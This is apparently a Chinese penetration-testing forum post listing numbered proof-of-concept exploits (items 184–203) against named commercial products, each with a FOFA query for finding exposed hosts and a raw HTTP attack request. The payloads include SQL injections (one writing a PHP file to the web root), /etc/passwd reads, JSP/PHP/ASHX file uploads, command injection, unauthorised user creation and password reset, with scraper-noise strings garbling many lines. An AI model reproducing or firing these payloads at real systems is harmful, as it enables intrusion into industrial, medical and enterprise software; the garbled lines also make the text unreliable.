User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( `* |6 ~# z# d, F5 fAccept-Charset: utf-8; F2 w3 ^, E5 G0 T6 U$ x% Y
Accept-Encoding: gzip, deflate; _' ]* K+ L# X% e9 g
Connection: close8 e$ j+ ~: s) q( O: y! R: h

1 L5 a4 m: j+ Q4 N6 c/ |2 q
# s/ s; H3 I% p& X1 i+ W184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
+ @* H' ]; U' y, ]2 O1 e% N0 p1 x/ sFOFA:server="SunFull-Webs"- `+ h% a$ P  c# ~3 q8 W
POST /soap/AddUser HTTP/1.1
8 i/ v6 I5 A+ `, {4 z1 t( ~+ mHost: your-ip9 e$ d; o4 N7 t, ]2 Y) p
Accept-Encoding: gzip, deflate
" O/ H2 `8 A2 X* S! B4 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
* }0 u& M, d) a1 f  Q0 b: zAccept: application/xml, text/xml, */*; q=0.016 W# E( A' Z- `8 X% i4 u
Content-Type: text/xml; charset=utf-83 s0 \# W; w# l7 i, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ r( b3 ]! u5 Y0 _4 E9 I9 o0 BX-Requested-With: XMLHttpRequest  g- T( T6 F) o4 o5 A
1 t4 d; C( H  z1 v2 ^# q
/ s8 D$ V  t, S
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
6 t* ~( s; x" l1 ^0 y. L# d5 h. F
9 ~9 n! w. n, p, ?1 c. h8 U# [& T6 D5 O9 [1 F
185. 瑞友天翼应用虚拟化系统SQL注入' m( I8 a* |; p, X. Q
version < 7.0.5.1( @( U: K8 _0 v) ~/ d
FOFA:app="REALOR-天翼应用虚拟化系统"2 B4 G8 m& @% j/ X& _
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.15 A8 A, ^/ p  ]. Y
Host: host: S- ?+ L/ s3 ?
. E4 p5 }, `4 }, g8 R

& Y8 {$ R* r8 h186. F-logic DataCube3 SQL注入
& ?5 U- j9 D) R! T) R' `- O. i: iCVE-2024-31750
. K# @" s% p5 U. e% R0 JF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统: ~9 d$ I1 \7 H! M
FOFA:title=="DataCube3"
; x, {9 I% H: q& k9 r7 b' M1 vPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
# p; [" l% v: H$ e+ s/ x. Q' sHost: your-ip
$ ~: g2 ~5 r  c# H0 [. e1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( H9 M0 @- A; \- k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8  h/ |5 ]4 Y; I- {4 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) J& s0 ?$ W9 t. I( }Accept-Encoding: gzip, deflate/ K  y. g) Z4 ^& a6 s
Connection: close! t/ }9 `4 c8 O# k' U/ f
Content-Type: application/x-www-form-urlencoded& F3 K2 i! K) V( K; y9 ^

1 \* [/ s; M: Q: |5 [6 vreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
8 z1 f4 [$ H1 L. j% c$ @7 m) t" |$ S  l# t% d3 P! h* P  l/ B
8 [% e0 ]" f1 h+ L% d% p/ Y
187. Mura CMS processAsyncObject SQL注入
1 N( g( i+ B) U4 Q1 @- RCVE-2024-32640
! J8 M5 k# N0 F* j) v8 LFOFA:"Mura CMS"* _1 t1 G3 O1 p9 ]5 f
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" J8 }/ A" w1 m
Host: your-ip5 y7 \  J. Y0 {( j% _- j+ \
Content-Type: application/x-www-form-urlencoded6 s% ~4 s! N8 s( ]4 P/ ?) W& k2 @4 u
+ G( \3 N- B* B) ?1 P' w

) [0 c, j8 l- a3 f6 i8 Sobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
' E3 p& v! w: Y6 R8 B" q2 w- q1 I7 P- \

4 l' q6 L2 A9 f* ]5 A4 W188. 叁体-佳会视频会议 attachment 任意文件读取
) `! }0 C6 x) i* j2 _version <= 3.9.79 F! `2 Z+ C- l# r% Z
FOFA:body="/system/get_rtc_user_defined_info?site_id"' U2 P4 c0 ~' ?, ]6 ]* t
GET /attachment?file=/etc/passwd HTTP/1.1
  K6 O2 \  u* S8 Q" }; ~Host: your-ip
) E8 n6 p# K+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: G: h' h% {8 W+ G6 q: |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* i( M& A( V" y% p, \
Accept-Encoding: gzip, deflate9 B; Q! S. c$ M0 U3 ]1 m) {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 `" y! [+ t; {+ |) G
Connection: close- r: m& \; ?1 [

+ {. o2 N( B# X2 i/ _" Y( I4 h1 B8 L/ o/ e2 P' c  y9 m$ I
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
$ w, E1 _  _/ @4 x* B9 BFOFA:app="LANWON-临床浏览系统"
3 H: i3 C& g1 k  Y6 S5 _& CGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 R% M$ E9 N' r' q" c$ G$ `
Host: your-ip. ?) p5 Z$ ?) d+ E. K4 U
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) E" t) c2 ]  p4 g; i4 F* n+ e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 D/ L+ ?, ^3 v& L* f
Accept-Encoding: gzip, deflate( S  U  S: d2 D+ |: `- R( N: E
Accept-Language: zh-CN,zh;q=0.9- |& w6 b+ v' Z
Connection: close
2 S8 |7 Y& _7 h$ r4 C7 K5 f9 g* M
2 B% w1 \5 k* h& v
190. 短视频矩阵营销系统 poihuoqu 任意文件读取9 O( z# E& Y" d. i, y
FOFA:title=="短视频矩阵营销系统"
# z+ m. L+ H5 S; k' BPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
* h. N# V6 E! ^% ~% p7 N% U7 ZHost: your-ip; E. n6 A$ O! b( Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.369 @# r3 M! r3 ?" }# u6 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 _2 {% ^. E+ {. m
Content-Type: application/x-www-form-urlencoded
+ m! t; m# M3 t2 Z! mAccept-Encoding: gzip, deflate
; ^& m* B: ]4 p3 @Accept-Language: zh-CN,zh;q=0.9
; ]% }" f1 W5 p/ r5 s8 Q; @) Q5 G- U1 ?
poi=file:///etc/passwd# K+ F' f0 B; K9 M: @

" |5 ]0 ?3 d% p8 o. T' V) ?
! I& V% {  j. l4 E191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入9 D5 U* T: p- f9 U
FOFA:body="/CDGServer3/index.jsp"
1 P% a7 E7 g. W1 Y9 [POST /CDGServer3/js/../NavigationAjax HTTP/1.1
+ [% s! W+ T+ h+ r, {% ?Host: your-ip; @- t* U' Z4 w: C/ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* ]9 U0 A8 m; |Content-Type: application/x-www-form-urlencoded; M# L& ]" s# G, l9 H1 N

$ M* T3 O- K: e/ V5 Y* bcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=4 W- s* Y: L# s
' N. @5 v- v; Z  G  h9 ^

7 G* J2 x7 C9 p; ~4 s9 l' s$ }) ^192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
" a% X1 y2 y0 G9 d5 D. XFOFA:title="用户登录_富通天下外贸ERP"
7 |" u  D1 g& r6 U3 c" t, TPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+ @2 G1 P- ^  }$ ?9 m/ U& ]Host: your-ip
" @* O  P9 s9 a8 |# B" mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& h- L% D( I% D$ u, a1 X
Content-Type: application/x-www-form-urlencoded
5 Q' f) A+ J- E/ _  h: }5 i
$ Y/ Q) ^9 p4 n: p$ m" ?* d3 b. a" m
<% @ webhandler language="C#" class="AverageHandler" %>
" d3 T# T: D& W+ R* Cusing System;: D" P& L" m' c7 g
using System.Web;* F! u# `' S. j6 ]4 @) d; A/ ~
public class AverageHandler : IHttpHandler
% ^) L4 u5 i  \. m1 h9 ?& C7 Y{: j$ ^: Z( N+ u* _5 L7 V$ O% J
public bool IsReusable
: L( f& X+ d5 G  i; t4 W: M{ get { return true; } }
; K# V% S5 |* P5 lpublic void ProcessRequest(HttpContext ctx)9 q6 X6 @" V4 `$ ^+ G
{
& \9 c! n% B3 n- ]6 N4 wctx.Response.Write("test");: H+ z9 S2 U$ }/ h
}
+ ~4 N3 x( S4 v9 u7 i}
$ k3 U+ d. C! w/ v9 ^7 v
4 U7 m9 g$ e0 j8 c& D! k0 Z0 M8 m& i: b4 u. J( e0 i# w
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 Q. q1 d- y  R2 b
FOFA:body="山石云鉴主机安全管理系统"' w! ^$ O# f, C( w! @
GET /master/ajaxActions/getTokenAction.php HTTP/1.12 U# Z" {" o) L3 I6 ^
Host:4 G3 c  q6 P7 w6 g* o2 L% q
Cookie: PHPSESSID=2333333333333;
! m# Q9 n$ G- k4 w3 H/ v* ^' _2 ~Content-Type: application/x-www-form-urlencoded1 l, \- i8 f2 X7 {
User-Agent: Mozilla/5.0+ ]) Y) Q0 I; b7 i3 j- R9 `
" F9 s9 r, M, P& \3 u
( b4 o, E7 `$ O( a3 ^+ Q
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
& _) X; k% h+ G2 sHost:( Y$ B7 }. Q7 ?' V
User-Agent: Mozilla/5.0% m" h) Y1 @& d. S" R
Accept-Encoding: gzip, deflate. v# O/ X! m& I; }* C
Accept: */*
/ i: C6 k- X- nConnection: close7 p1 Y% i$ [+ l9 `; ^
Cookie: PHPSESSID=2333333333333;
+ c2 z9 F$ r3 Y2 mContent-Type: application/x-www-form-urlencoded' y: f$ c, ]3 L/ x
Content-Length: 84
6 n* Z) s+ x& f* f- ^4 W
) U$ G1 Y0 h+ u. R" i: r8 ]4 p, S% hparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')+ l/ K. t/ b/ e6 |$ E3 y. l0 F+ e' e
# ^) |/ |" u8 D8 N

4 Y" ?3 Y) U  G) ~! u" F1 bGET /master/img/config HTTP/1.1) C1 I( T) c9 N" }
Host:
4 \+ J4 p" b- o3 v0 KUser-Agent: Mozilla/5.0) P8 P# |' y2 E2 z4 {
: a) E6 u4 T" q& V' e: m" r

& ?% n* Z/ @7 o' @8 G4 R194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
8 E; X$ b2 n$ G2 xFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
% x  d( [  ^, e6 l
+ V7 A: S8 Z; U4 R8 Z; BPOST /servlet/uploadAttachmentServlet HTTP/1.1  x0 ], Q5 G+ D% S8 C
Host: host
; g% C- r) i2 L5 U- [2 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.365 j6 |) H, G3 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, \5 K3 ]& A1 h" [) U& kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 M; u% @  U" [' m" E5 _/ i
Accept-Encoding: gzip, deflate
/ g; x3 @* `$ r5 MConnection: close
# v! C! |( v! w+ w, d+ W# J* D6 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
- t) Q7 b8 y7 G2 ]  Y$ X------WebKitFormBoundaryKNt0t4vBe8cX9rZk; r' d/ h1 I5 d4 H- s8 Y
% g, y/ c4 j# w) {- l2 U
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"2 n* M- r* i1 F3 g" ]- k
Content-Type: text/plain
0 t4 O! w  z" G6 O/ o4 ?- ?0 K- v! M<% out.println("hello");%>: o# V, I; y5 q  C
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" H2 z1 K( o. M" d: @Content-Disposition: form-data; name="json"
5 ]' s' f+ V$ S: A {"iq":{"query":{"UpdateType":"mail"}}}
/ y# ^9 W  E% C6 s) Y" b7 k) N% O------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
( Z8 [5 R8 [, T* J* Y4 v" \+ Q$ T/ L* s3 C2 v4 v
) M1 C5 [1 `! y- Z9 E9 e& e
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 d, G% f2 o6 X7 _2 ^  t( Z, O! R
FOFA:title=="飞鱼星企业级智能上网行为管理系统2 P! u4 ~: ?. n: ^! s4 l) Y8 V" S
POST /send_order.cgi?parameter=operation HTTP/1.1
. k/ z0 @+ }/ E& ^Host: 127.0.0.1
6 K& j1 l. C" [" ]5 N) b( w! mPragma: no-cache3 }- h6 i$ _, l: P1 p
Cache-Control: no-cache
0 X' t3 X9 P$ |! C# E/ u4 C  tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 k, S) P- v+ v% yAccept: */*1 A! Y. R" S2 ^% b* ]: S
Accept-Encoding: gzip, deflate
8 p. n: C' y' N8 R, E; oAccept-Language: zh-CN,zh;q=0.9
$ A1 e7 g: V* A$ g% tConnection: close# d- X" Q) A) h  e7 p/ J( l- Y
Content-Type: application/x-www-form-urlencoded
/ S1 W/ O+ P8 y6 B+ t' KContent-Length: 68; o, c  m9 n8 W1 R
) A+ H* M" u1 Z5 d' @8 D
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
. P' h7 V$ J( q( C+ o
, R  U! v9 r: l9 r7 h2 }9 R7 W8 _* f" s) @+ p2 k
196. 河南省风速科技统一认证平台密码重置
: \# k% t1 M1 ]" cFOFA:body="/cas/themes/zbvc/js/jquery.min.js"2 W  i: r- z% Z- X
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 c: S+ S0 h" sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
4 Y- t2 a1 X' O4 G& y5 xContent-Type: application/json;charset=UTF-8. V+ U! @( A( h# |" z7 c
X-Requested-With: XMLHttpRequest
5 H( G9 N2 Z# e& ~8 h$ r) N  cHost:
! ]8 k1 A  U& C) ^2 V7 G# CAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.23 q3 H, \& z" l/ O: h
Content-Length: 45
% y6 b- X! z) R# g8 g# b8 dConnection: close9 P' U# S* [* T, H1 A! f
, J; e' U/ [- y3 V! n- J
{"xgh":"test","newPass":"test666","email":""}
2 h0 n6 a" Y: P! B. U7 {& L% S
. B. T( H# }( y. K/ E2 C/ W- |2 ]+ F# M  Z% Q& _$ J
. B1 l1 |, S+ `( e2 L
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' W/ I# P6 a' d* w* SFOFA:app="浙大恩特客户资源管理系统"- o9 R1 a. Y% R' ^* e
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
0 U  s% T+ O* ]( s: K6 L) Q+ s: QHost:
8 X- W8 F' b4 k8 y) AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
0 |7 J) s' w/ \( @Accept-Encoding: gzip, deflate8 c3 H: a2 n8 P
Connection: close* L) t  a! z) @+ v/ ^& b$ }
/ a! m  A7 q, C2 ^$ W
; @9 S, ?/ r& X, r- ~8 x2 x' F" ]
' }( ^0 r/ v  h1 t' R
198.  阿里云盘 WebDAV 命令注入* A' |* i+ n0 i! N' i
CVE-2024-296407 e9 w6 q7 l1 O2 L! C- z
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
- c6 c9 f6 o" @- F; RCookie: sysauth=41273cb2cffef0bb5d0653592624cf64+ P# G' g# U: x* _% L* j$ ^: Q
Accept: */** _! [* g: @/ z6 i  `2 x0 a
Accept-Encoding: gzip, deflate
4 v; D8 C! N+ b  J" t5 KAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6" `8 w" v1 b) n% `$ {- N( @
Connection: close
8 ?, A6 d: Q3 ]1 Y, g* x& g' K  @7 E* A  R( V+ C4 i
9 r& [" g% E# y! {
199. cockpit系统assetsmanager_upload接口 文件上传( L: |* t& |- z, T3 B% y9 {

* O0 r. Z6 V! s" |6 y, ~# ?8 X3 _1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
/ e' ^2 I% k, \8 B, C1 b, `GET /auth/login?to=/ HTTP/1.1
- h# k: {; W- ~. v, i& S1 {& U  k% [  D8 B
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
+ V" D* y8 ?8 _8 ^  l1 K
% W0 {) ~0 \# S& q2 s3 c2.使用刚才上一步获取到的jwt获取cookie:
: h# v5 D+ |) r, L! V) q& B  g: J( ?2 H. T7 H1 t! h8 \
POST /auth/check HTTP/1.1! g8 r" I/ ^3 ^' h* r" g
Content-Type: application/json
4 }/ N+ k# h  H( C; D! c9 m' l6 a% }
+ U; Q) ]" Q; v/ D% G{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}$ L9 P3 d/ M0 O" l

! p/ B# [, P# ?' W4 F: \响应:200,返回值:
  f' j8 q$ @2 p3 p% S9 S& MSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
8 U* e. l+ l4 G8 P2 }- XFofa:title="Authenticate Please!"
- A" V. V& w5 O! u7 F$ }POST /assetsmanager/upload HTTP/1.1. N0 ]) F% h/ _; S2 o) d0 T3 s. P+ c
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
" f2 B3 G" H3 ^) q; v; Q5 [' U! PCookie: mysession=95524f01e238bf51bb60d77ede3bea92
4 b0 u* _# U2 J; m* ?! Q; k; b" ~1 [# ?+ @4 h% r
-----------------------------36D28FBc36bd6feE7Fb32 b% z' l0 i- d- K$ h, p$ Q. h) y  k
Content-Disposition: form-data; name="files[]"; filename="tttt.php"7 y! K9 s; k# W  t8 Q
Content-Type: text/php
( J$ }, v3 d( A  P, v3 U7 n
0 {0 |4 r2 T) V+ Z/ Z0 e) V) P<?php echo "tttt";unlink(__FILE__);?>6 B1 v4 u4 t7 k" R: {" R' W6 V5 t4 [
-----------------------------36D28FBc36bd6feE7Fb3; M# L, j1 p6 u2 [9 K. e3 r4 y
Content-Disposition: form-data; name="folder"  [5 R% e( E1 H; `: R! I
$ ?- J; z8 b9 }) Y, n1 S  j. X; l
-----------------------------36D28FBc36bd6feE7Fb3--: h3 p4 F+ |! z$ O& g, R7 O9 s6 @

1 [3 G7 X+ k0 p) V% d: }- j/ M1 g4 C
7 z! R& o" B- ^' p; g& O5 x/storage/uploads/tttt.php, H; ?% I! K& q

6 d7 Y; c, t0 L4 y200. SeaCMS海洋影视管理系统dmku SQL注入
/ y# m' H; C, B9 f2 K' L0 gFOFA:app="海洋CMS"
0 p3 N1 P* i7 b6 E3 oGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1% s6 U/ Q+ R+ s! i2 @% _" V
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
1 t; ^2 z9 F. |. x2 z: g& v0 KUpgrade-Insecure-Requests: 1, D& w: n( y; S( D* V
Cache-Control: max-age=0
$ @& l) }7 m1 g& z9 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, j; B) O4 _  W  j( Q0 DAccept-Encoding: gzip, deflate
) h0 @( T+ o- j4 o5 y2 VAccept-Language: zh-CN,zh;q=0.9
2 p3 Y9 A2 Q) c( d! p. f+ A7 ^
+ L/ W9 C: P1 i# s
201. 方正全媒体新闻采编系统 binary SQL注入( ?; o$ x2 T8 x6 j& _$ |+ I( s- y
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"* k7 ^/ i- m) d9 g9 L
POST /newsedit/newsplan/task/binary.do HTTP/1.1
2 b# m0 d4 b1 A! a3 L+ OContent-Type: application/x-www-form-urlencoded( `8 n! }+ k) G' N: a" W5 D, g7 h: S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 B0 |2 m6 t: WAccept-Encoding: gzip, deflate3 N7 |, ~0 F! e7 g
Accept-Language: zh-CN,zh;q=0.9+ F2 ]$ s( @1 M9 N+ Z
Connection: close
( ]( I4 C6 o1 H4 P, }
! B" c. ~- {) bTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1! E! Y/ E# _/ E: e' c

  P' i1 ~, _; ?
5 B+ w# n' f2 x+ P5 X202. 微擎系统 AccountEdit任意文件上传
( u! S$ N7 c, Z+ j& {0 l, BFOFA:body="/Widgets/WidgetCollection/"
$ c! [' m1 J7 L' l获取__VIEWSTATE和__EVENTVALIDATION值. b) `) h" @+ @
GET /User/AccountEdit.aspx HTTP/1.1
3 X- u: U" X9 ~( X3 c: [, xHost: 滑板人之家% ]  h0 o' a, S3 G! H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.313 j' W0 `) w: o+ x" w; P
Content-Length: 0
6 s# S, W7 `$ A2 V' q9 y: N2 z+ k5 X5 p8 p3 Y2 I1 k3 }8 ~2 w

& Z& Q/ D+ @& \, N; L( c' a* u6 Q0 R替换__VIEWSTATE和__EVENTVALIDATION值% Q( H4 H$ l' ~# G6 h" u
POST /User/AccountEdit.aspx HTTP/1.15 e0 M3 \& y- U
Accept-Encoding: gzip, deflate, br4 {) m( N6 M$ K( P+ }
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687: t# _2 \4 d' K7 z! V5 P$ ~# k

2 {: {0 i) x) S$ u-----------------------------786435874t385875938657365873465673587356878 j+ A( q4 l. W8 ?7 U* ?; t
Content-Disposition: form-data; name="__VIEWSTATE"% s& D" l: Y4 Y3 P2 A5 M
9 I3 b7 L9 Z0 j. P, p0 z) d
__VIEWSTATE
& L2 Y/ ?1 p+ ]* C! V6 I8 Y-----------------------------786435874t38587593865736587346567358735687
* N+ z+ i' y4 t' y1 nContent-Disposition: form-data; name="__EVENTVALIDATION"8 H! v: c" K5 z# A0 V
+ C% M* S2 N- [1 _2 m" C
__EVENTVALIDATION: k# ~/ f/ W/ ?1 C0 v
-----------------------------786435874t38587593865736587346567358735687
. W* O8 n1 d6 O- F* l3 lContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
7 D) O* _4 q" v1 |8 J$ n3 F% wContent-Type: text/plain8 x! L2 K$ t5 _% A( g
3 _" V' u) A: v, `' m
Hello World!
* v4 N( o  N7 _; G. e6 n3 Z( b$ {4 @-----------------------------786435874t38587593865736587346567358735687
4 l% S' Z8 u  ]. H8 i. W. y+ `Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( M% Q; V2 D9 [0 \+ {
" q* |7 i2 }  x7 ^
上传图片
' b# G* v, x# `7 s% t( U-----------------------------786435874t38587593865736587346567358735687, I" H/ y. a! I, t8 {
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
8 F/ C* [/ y, a. l$ k: E& d2 c4 M6 v6 o" |
; b% ?# I3 c" d5 \) B( i. _7 N6 T) X
-----------------------------786435874t38587593865736587346567358735687# m) {  G# k/ @( h3 j8 J
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
6 \0 l  Q) o6 S7 V9 \. X8 P
' R+ ~( J6 r$ g( ]& z
" f9 r* Y  l6 O1 x$ p  m0 i* `-----------------------------786435874t38587593865736587346567358735687--
$ w- f8 Z2 H3 _4 Q* \  [+ W3 C9 B" g* s
8 L! P# W* t4 p; S
% M2 I3 G  n5 i. s9 g; s6 \% H/_data/Uploads/1123.txt
5 D& T+ B; [- W1 ~
, g4 k7 w! j# p& V. x. A203. 红海云EHR PtFjk 文件上传' G/ ^/ H4 Z  k; Z/ l
FOFA:body="RedseaPlatform"
8 T. u% ?# L2 q+ z+ l. a7 |7 VPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
. x8 U' J8 ~# T5 dHost: x.x.x.x
6 V. Z0 w+ H: o6 k! @; U- nAccept-Encoding: gzip" v0 Y4 V9 b  g6 `/ ?0 j" p; [: |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# `- Z, ~. g) {, }( E1 g1 ?/ D$ q/ e0 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
/ W( H" S8 s# y3 O' q5 N) N( \& L' _Content-Length: 210
% E9 C8 G$ Y2 X5 U- p) K0 @. S! K. A1 T
------WebKitFormBoundaryt7WbDl1tXogoZys41 A' a3 p8 h3 R0 D, A
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
! Z+ c1 k- @* x- U9 s" E/ T5 Y( _* N8 LContent-Type:image/jpeg! v# C: s8 \: s  o0 C; ^
% w; A% N1 \" @3 `, K
<% out.print("hello,eHR");%>
* G" z5 v2 o! c6 l; ?------WebKitFormBoundaryt7WbDl1tXogoZys4--3 c- k8 u: T3 J$ N1 m
8 P0 W4 u* {( q; V

% e8 }6 X( ^1 i: A0 {
& e- e5 w/ o7 h5 E
, f2 {  E% C; \9 f$ y: S
. }' @* Z/ J: |, l% q8 v  M5 O$ r; Z/ q7 i



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2